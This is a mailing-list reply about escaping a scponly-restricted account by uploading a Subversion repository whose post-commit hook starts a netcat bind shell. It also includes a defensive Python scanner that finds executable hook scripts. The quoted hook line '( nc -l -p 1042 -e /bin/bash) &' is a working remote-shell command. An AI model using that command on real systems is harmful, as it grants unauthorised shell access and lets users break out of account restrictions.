* Joachim Breitner:

> messing around with some friends here, I tried to access his computer
> with only a scponly protected account. I discovered this way of gaining
> full shell access:
>
> I locally created a subversion repository /tmp/blubb with
> a /tmp/blubb/hooks/post-commit that contains the command:
>         ( nc -l -p 1042 -e /bin/bash) &

This is an unfortunate interaction between scponly and Subversion, but
not a real bug in any of the programs.  The same problem arises when a
scponly-restricted user uploads any form of executable contents.  CGI
scripts are more common (and there are so-called "PHP shells" which are
explicitly designed to exploit this).
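
A defender's check for the interaction discussed in this thread, as an added example that is not part of the original messages: it walks a directory tree (for instance the area scponly users can write to), finds Subversion repositories, and lists the hook scripts that are executable. The repository heuristic, the function names and the sample tree are assumptions made for this example.

```python
import os
import stat
import tempfile

# Hook names Subversion looks for in <repo>/hooks; *.tmpl templates are never run.
SVN_HOOKS = {"start-commit", "pre-commit", "post-commit",
             "pre-revprop-change", "post-revprop-change",
             "pre-lock", "post-lock", "pre-unlock", "post-unlock"}

def is_svn_repo(path):
    """Heuristic (assumption): a 'format' file plus 'db' and 'hooks' directories."""
    return (os.path.isfile(os.path.join(path, "format"))
            and os.path.isdir(os.path.join(path, "db"))
            and os.path.isdir(os.path.join(path, "hooks")))

def find_active_hooks(root):
    """Return sorted (repo_path, hook_name) pairs for executable hook scripts."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        if not is_svn_repo(dirpath):
            continue
        hooks_dir = os.path.join(dirpath, "hooks")
        for name in os.listdir(hooks_dir):
            try:
                mode = os.stat(os.path.join(hooks_dir, name)).st_mode
            except OSError:
                continue  # dangling symlink or unreadable entry
            if name in SVN_HOOKS and stat.S_ISREG(mode) and mode & 0o111:
                findings.append((dirpath, name))
        dirnames[:] = []  # do not descend into the repository itself
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample: one uploaded repository with three files under hooks/."""
    repo = os.path.join(root, "home", "alice", "blubb")
    os.makedirs(os.path.join(repo, "db"))
    os.makedirs(os.path.join(repo, "hooks"))
    open(os.path.join(repo, "format"), "w").close()
    for name, mode in (("post-commit", 0o755), ("pre-commit.tmpl", 0o755),
                       ("start-commit", 0o644)):
        path = os.path.join(repo, "hooks", name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")  # harmless placeholder body
        os.chmod(path, mode)
    return repo

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(find_active_hooks(tmp))
```

Only the executable `post-commit` is reported; the template and the non-executable `start-commit` are skipped.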

